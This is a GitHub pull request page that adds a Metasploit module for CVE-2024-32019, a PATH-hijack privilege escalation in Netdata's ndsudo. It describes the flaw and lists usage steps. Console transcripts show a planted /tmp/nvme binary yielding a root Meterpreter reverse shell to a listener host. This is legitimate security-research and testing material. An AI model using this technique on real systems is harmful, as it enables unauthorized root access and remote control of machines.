Skip to content

Adds module for ndsudo privilege escalation (CVE-2024-32019) #20460

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 7 commits into from
Aug 20, 2025
Merged

Adds module for ndsudo privilege escalation (CVE-2024-32019) #20460

merged 7 commits into from
Aug 20, 2025
+143 −0

Conversation

msutovsky-r7
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 commented Aug 11, 2025
edited
Loading

This PR adds module for CVE-2024-32019 - privilege escalation for ndsudo.

Vulnerable Application

The ndsudo is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using ndsudo binary. The vulnerability is untrusted search path, when searching for additional binary files, such as nvme. An attacker can create malicious binary with same name and add the directory of this binary into $PATH variable. The ndsudo will trust the first occurence of this binary and execute it.

Installation steps:

  1. sudo apt install cmake libelf-dev git bison flex build-essential libssl-dev pkg-config liblz4-dev libzstd-dev libbrotli-dev uuid-dev libuv1-dev
  2. wget https://github.com/netdata/netdata-nightlies/releases/download/v1.45.0-8-nightly/netdata-latest.tar.gz
  3. gunzip netdata-latest.tar.gz
  4. tar -xf netdata-latest.tar
  5. cd netdata-v1.45.0-8-g5803c7766/
  6. sudo ./netdata-installer.sh

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Receive a session
  4. Do: use exploit/linux/local/ndsudo_cve_2024_32019
  5. Do: set session [session number]
  6. Do: run
  7. Get root shell/meterpreter session

Options

WritableDir

A path where malicious nvme binary will be stored. This path will be later prepended to $PATH variable to achieve privilege escalation.

NdsudoPath

A path to ndsudo binary.

Scenarios

msf exploit(linux/local/ndsudo_cve_2024_32019) > run verbose=true
[*] Started reverse TCP handler on 192.168.3.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable binary detected
[*] Creating malicious file at /tmp/nvme
[*] Writing '/tmp/nvme' (250 bytes) ...
[*] Executing..
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 10.5.134.200
[+] Deleted /tmp/nvme
[*] Meterpreter session 3 opened (192.168.3.7:4444 -> 10.5.134.200:53172) at 2025-08-11 11:05:24 +0200
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 10.5.134.200
OS           : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

smcintyre-r7
smcintyre-r7 reviewed Aug 14, 2025
View reviewed changes
documentation/modules/exploit/linux/local/ndsudo_cve_2024_32019.md Outdated
@@ -0,0 +1,60 @@
## Vulnerable Application

The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it.
The `ndsudo` is a tool shipped with Netdata Agent. Versions v1.45.0 and below contain a vulnerability, which allows an attacker to gain privilege escalation using the `ndsudo` binary. The vulnerability is an untrusted search path. When searching for additional binary files, such as `nvme`, an attacker can create a malicious binary with same name and add the directory of this binary into the `$PATH` variable. The `ndsudo` will trust the first occurrence of this binary and execute it.

@msutovsky-r7 msutovsky-r7 marked this pull request as ready for review August 15, 2025 05:27
mayurtadvi352-svg added a commit to mayurtadvi352-svg/metasploit-framework that referenced this pull request Aug 15, 2025
@mayurtadvi352-svg
Update README.md mm
c617e70 
Hacke for divase 
rapid7#20460 rapid7#12600 rapid7#20470 rapid7#20400 #
smcintyre-r7
smcintyre-r7 approved these changes Aug 20, 2025
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Things look good to me. I was able to test this out and confirm it's working as intended. Nice work @msutovsky-r7, thanks for adding this exploit.

msf exploit(linux/local/ndsudo_cve_2024_32019) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: smcintyre @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.134
OS           : Ubuntu 24.04 (Linux 6.11.0-25-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(linux/local/ndsudo_cve_2024_32019) > show options 

Module options (exploit/linux/local/ndsudo_cve_2024_32019):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf exploit(linux/local/ndsudo_cve_2024_32019) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable binary detected
[*] Writing '/tmp/nvme' (250 bytes) ...
[*] Sending stage (3008420 bytes) to 192.168.159.134
[+] Deleted /tmp/nvme
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.134:41390) at 2025-08-20 14:11:19 -0400


meterpreter > 
meterpreter > getuid
Server username: root @ ubuntu (uid=1000, gid=1000, euid=0, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.134
OS           : Ubuntu 24.04 (Linux 6.11.0-25-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/home/smcintyre/netdata-v1.45.0-8-g5803c7766
meterpreter >

@smcintyre-r7 smcintyre-r7 merged commit 5735a82 into rapid7:master Aug 20, 2025
17 checks passed
@smcintyre-r7 smcintyre-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 20, 2025
@smcintyre-r7 smcintyre-r7 self-assigned this Aug 20, 2025
@bwatters-r7
Copy link
Contributor

Release Notes

Adds a module for CVE-2024-32019 - privilege escalation for ndsudo.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@msutovsky-r7 @bwatters-r7 @smcintyre-r7